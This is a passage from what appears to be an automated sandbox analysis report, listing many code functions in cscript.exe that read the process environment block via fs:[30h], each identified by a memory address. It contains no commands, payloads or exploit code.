            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CFD9B mov eax, dword ptr fs:[00000030h]19_2_048CFD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CFD9B mov eax, dword ptr fs:[00000030h]19_2_048CFD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C35A1 mov eax, dword ptr fs:[00000030h]19_2_048C35A1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C1DB5 mov eax, dword ptr fs:[00000030h]19_2_048C1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C1DB5 mov eax, dword ptr fs:[00000030h]19_2_048C1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C1DB5 mov eax, dword ptr fs:[00000030h]19_2_048C1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049605AC mov eax, dword ptr fs:[00000030h]19_2_049605AC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049605AC mov eax, dword ptr fs:[00000030h]19_2_049605AC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]19_2_04916DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]19_2_04916DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]19_2_04916DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov ecx, dword ptr fs:[00000030h]19_2_04916DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]19_2_04916DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]19_2_04916DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04948DF1 mov eax, dword ptr fs:[00000030h]19_2_04948DF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AD5E0 mov eax, dword ptr fs:[00000030h]19_2_048AD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AD5E0 mov eax, dword ptr fs:[00000030h]19_2_048AD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]19_2_0495FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]19_2_0495FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]19_2_0495FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]19_2_0495FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968D34 mov eax, dword ptr fs:[00000030h]19_2_04968D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0491A537 mov eax, dword ptr fs:[00000030h]19_2_0491A537
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495E539 mov eax, dword ptr fs:[00000030h]19_2_0495E539
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4D3B mov eax, dword ptr fs:[00000030h]19_2_048C4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4D3B mov eax, dword ptr fs:[00000030h]19_2_048C4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4D3B mov eax, dword ptr fs:[00000030h]19_2_048C4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489AD30 mov eax, dword ptr fs:[00000030h]19_2_0489AD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]19_2_048A3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D3D43 mov eax, dword ptr fs:[00000030h]19_2_048D3D43
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04913540 mov eax, dword ptr fs:[00000030h]19_2_04913540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B7D50 mov eax, dword ptr fs:[00000030h]19_2_048B7D50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BC577 mov eax, dword ptr fs:[00000030h]19_2_048BC577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BC577 mov eax, dword ptr fs:[00000030h]19_2_048BC577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492FE87 mov eax, dword ptr fs:[00000030h]19_2_0492FE87
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04960EA5 mov eax, dword ptr fs:[00000030h]19_2_04960EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04960EA5 mov eax, dword ptr fs:[00000030h]19_2_04960EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04960EA5 mov eax, dword ptr fs:[00000030h]19_2_04960EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049146A7 mov eax, dword ptr fs:[00000030h]19_2_049146A7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968ED6 mov eax, dword ptr fs:[00000030h]19_2_04968ED6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C36CC mov eax, dword ptr fs:[00000030h]19_2_048C36CC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D8EC7 mov eax, dword ptr fs:[00000030h]19_2_048D8EC7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494FEC0 mov eax, dword ptr fs:[00000030h]19_2_0494FEC0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A76E2 mov eax, dword ptr fs:[00000030h]19_2_048A76E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C16E0 mov ecx, dword ptr fs:[00000030h]19_2_048C16E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489C600 mov eax, dword ptr fs:[00000030h]19_2_0489C600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489C600 mov eax, dword ptr fs:[00000030h]19_2_0489C600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489C600 mov eax, dword ptr fs:[00000030h]19_2_0489C600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C8E00 mov eax, dword ptr fs:[00000030h]19_2_048C8E00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA61C mov eax, dword ptr fs:[00000030h]19_2_048CA61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA61C mov eax, dword ptr fs:[00000030h]19_2_048CA61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951608 mov eax, dword ptr fs:[00000030h]19_2_04951608
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489E620 mov eax, dword ptr fs:[00000030h]19_2_0489E620
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494FE3F mov eax, dword ptr fs:[00000030h]19_2_0494FE3F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]19_2_048A7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]19_2_048A7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]19_2_048A7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]19_2_048A7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]19_2_048A7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]19_2_048A7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AE44 mov eax, dword ptr fs:[00000030h]19_2_0495AE44
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AE44 mov eax, dword ptr fs:[00000030h]19_2_0495AE44
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A766D mov eax, dword ptr fs:[00000030h]19_2_048A766D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]19_2_048BAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]19_2_048BAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]19_2_048BAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]19_2_048BAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]19_2_048BAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917794 mov eax, dword ptr fs:[00000030h]19_2_04917794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917794 mov eax, dword ptr fs:[00000030h]19_2_04917794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917794 mov eax, dword ptr fs:[00000030h]19_2_04917794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A8794 mov eax, dword ptr fs:[00000030h]19_2_048A8794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D37F5 mov eax, dword ptr fs:[00000030h]19_2_048D37F5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492FF10 mov eax, dword ptr fs:[00000030h]19_2_0492FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492FF10 mov eax, dword ptr fs:[00000030h]19_2_0492FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA70E mov eax, dword ptr fs:[00000030h]19_2_048CA70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA70E mov eax, dword ptr fs:[00000030h]19_2_048CA70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496070D mov eax, dword ptr fs:[00000030h]19_2_0496070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496070D mov eax, dword ptr fs:[00000030h]19_2_0496070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BF716 mov eax, dword ptr fs:[00000030h]19_2_048BF716
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04894F2E mov eax, dword ptr fs:[00000030h]19_2_04894F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04894F2E mov eax, dword ptr fs:[00000030h]19_2_04894F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CE730 mov eax, dword ptr fs:[00000030h]19_2_048CE730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AEF40 mov eax, dword ptr fs:[00000030h]19_2_048AEF40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AFF60 mov eax, dword ptr fs:[00000030h]19_2_048AFF60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968F6A mov eax, dword ptr fs:[00000030h]19_2_04968F6A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899080 mov eax, dword ptr fs:[00000030h]19_2_04899080
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04913884 mov eax, dword ptr fs:[00000030h]19_2_04913884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04913884 mov eax, dword ptr fs:[00000030h]19_2_04913884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D90AF mov eax, dword ptr fs:[00000030h]19_2_048D90AF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]19_2_048C20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]19_2_048C20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]19_2_048C20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]19_2_048C20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]19_2_048C20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]19_2_048C20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CF0BF mov ecx, dword ptr fs:[00000030h]19_2_048CF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CF0BF mov eax, dword ptr fs:[00000030h]19_2_048CF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CF0BF mov eax, dword ptr fs:[00000030h]19_2_048CF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]19_2_0492B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov ecx, dword ptr fs:[00000030h]19_2_0492B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]19_2_0492B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]19_2_0492B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]19_2_0492B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]19_2_0492B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048958EC mov eax, dword ptr fs:[00000030h]19_2_048958EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04964015 mov eax, dword ptr fs:[00000030h]19_2_04964015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04964015 mov eax, dword ptr fs:[00000030h]19_2_04964015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917016 mov eax, dword ptr fs:[00000030h]19_2_04917016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917016 mov eax, dword ptr fs:[00000030h]19_2_04917016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917016 mov eax, dword ptr fs:[00000030h]19_2_04917016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]19_2_048AB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]19_2_048AB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]19_2_048AB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]19_2_048AB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]19_2_048C002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]19_2_048C002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]19_2_048C002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]19_2_048C002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]19_2_048C002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B0050 mov eax, dword ptr fs:[00000030h]19_2_048B0050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B0050 mov eax, dword ptr fs:[00000030h]19_2_048B0050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04961074 mov eax, dword ptr fs:[00000030h]19_2_04961074
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04952073 mov eax, dword ptr fs:[00000030h]19_2_04952073
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BC182 mov eax, dword ptr fs:[00000030h]19_2_048BC182
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA185 mov eax, dword ptr fs:[00000030h]19_2_048CA185
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2990 mov eax, dword ptr fs:[00000030h]19_2_048C2990
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C61A0 mov eax, dword ptr fs:[00000030h]19_2_048C61A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C61A0 mov eax, dword ptr fs:[00000030h]19_2_048C61A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]19_2_049151BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]19_2_049151BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]19_2_049151BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]19_2_049151BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049169A6 mov eax, dword ptr fs:[00000030h]19_2_049169A6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B1E1 mov eax, dword ptr fs:[00000030h]19_2_0489B1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B1E1 mov eax, dword ptr fs:[00000030h]19_2_0489B1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B1E1 mov eax, dword ptr fs:[00000030h]19_2_0489B1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049241E8 mov eax, dword ptr fs:[00000030h]19_2_049241E8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899100 mov eax, dword ptr fs:[00000030h]19_2_04899100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899100 mov eax, dword ptr fs:[00000030h]19_2_04899100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899100 mov eax, dword ptr fs:[00000030h]19_2_04899100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]19_2_048B4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]19_2_048B4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]19_2_048B4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]19_2_048B4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov ecx, dword ptr fs:[00000030h]19_2_048B4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C513A mov eax, dword ptr fs:[00000030h]19_2_048C513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C513A mov eax, dword ptr fs:[00000030h]19_2_048C513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BB944 mov eax, dword ptr fs:[00000030h]19_2_048BB944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BB944 mov eax, dword ptr fs:[00000030h]19_2_048BB944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489C962 mov eax, dword ptr fs:[00000030h]19_2_0489C962
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B171 mov eax, dword ptr fs:[00000030h]19_2_0489B171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B171 mov eax, dword ptr fs:[00000030h]19_2_0489B171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CD294 mov eax, dword ptr fs:[00000030h]19_2_048CD294
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CD294 mov eax, dword ptr fs:[00000030h]19_2_048CD294
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]19_2_048952A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]19_2_048952A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]19_2_048952A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]19_2_048952A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]19_2_048952A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AAAB0 mov eax, dword ptr fs:[00000030h]19_2_048AAAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AAAB0 mov eax, dword ptr fs:[00000030h]19_2_048AAAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CFAB0 mov eax, dword ptr fs:[00000030h]19_2_048CFAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2ACB mov eax, dword ptr fs:[00000030h]19_2_048C2ACB
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2AE4 mov eax, dword ptr fs:[00000030h]19_2_048C2AE4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A8A0A mov eax, dword ptr fs:[00000030h]19_2_048A8A0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AA16 mov eax, dword ptr fs:[00000030h]19_2_0495AA16
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AA16 mov eax, dword ptr fs:[00000030h]19_2_0495AA16
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B3A1C mov eax, dword ptr fs:[00000030h]19_2_048B3A1C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov eax, dword ptr fs:[00000030h]19_2_04895210
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov ecx, dword ptr fs:[00000030h]19_2_04895210
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov eax, dword ptr fs:[00000030h]19_2_04895210
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov eax, dword ptr fs:[00000030h]19_2_04895210
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489AA16 mov eax, dword ptr fs:[00000030h]19_2_0489AA16
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489AA16 mov eax, dword ptr fs:[00000030h]19_2_0489AA16
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D4A2C mov eax, dword ptr fs:[00000030h]19_2_048D4A2C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D4A2C mov eax, dword ptr fs:[00000030h]19_2_048D4A2C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495EA55 mov eax, dword ptr fs:[00000030h]19_2_0495EA55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04924257 mov eax, dword ptr fs:[00000030h]19_2_04924257
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]19_2_04899240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]19_2_04899240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]19_2_04899240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]19_2_04899240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494B260 mov eax, dword ptr fs:[00000030h]19_2_0494B260
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494B260 mov eax, dword ptr fs:[00000030h]19_2_0494B260
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968A62 mov eax, dword ptr fs:[00000030h]19_2_04968A62
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D927A mov eax, dword ptr fs:[00000030h]19_2_048D927A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A1B8F mov eax, dword ptr fs:[00000030h]19_2_048A1B8F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A1B8F mov eax, dword ptr fs:[00000030h]19_2_048A1B8F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494D380 mov ecx, dword ptr fs:[00000030h]19_2_0494D380
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2397 mov eax, dword ptr fs:[00000030h]19_2_048C2397
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CB390 mov eax, dword ptr fs:[00000030h]19_2_048CB390
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495138A mov eax, dword ptr fs:[00000030h]19_2_0495138A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4BAD mov eax, dword ptr fs:[00000030h]19_2_048C4BAD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4BAD mov eax, dword ptr fs:[00000030h]19_2_048C4BAD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4BAD mov eax, dword ptr fs:[00000030h]19_2_048C4BAD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04965BA5 mov eax, dword ptr fs:[00000030h]19_2_04965BA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049153CA mov eax, dword ptr fs:[00000030h]19_2_049153CA
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049153CA mov eax, dword ptr fs:[00000030h]19_2_049153CA
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BDBE9 mov eax, dword ptr fs:[00000030h]19_2_048BDBE9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]19_2_048C03E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]19_2_048C03E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]19_2_048C03E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]19_2_048C03E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]19_2_048C03E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]19_2_048C03E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495131B mov eax, dword ptr fs:[00000030h]19_2_0495131B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489DB40 mov eax, dword ptr fs:[00000030h]19_2_0489DB40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968B58 mov eax, dword ptr fs:[00000030h]19_2_04968B58
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489F358 mov eax, dword ptr fs:[00000030h]19_2_0489F358
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489DB60 mov ecx, dword ptr fs:[00000030h]19_2_0489DB60
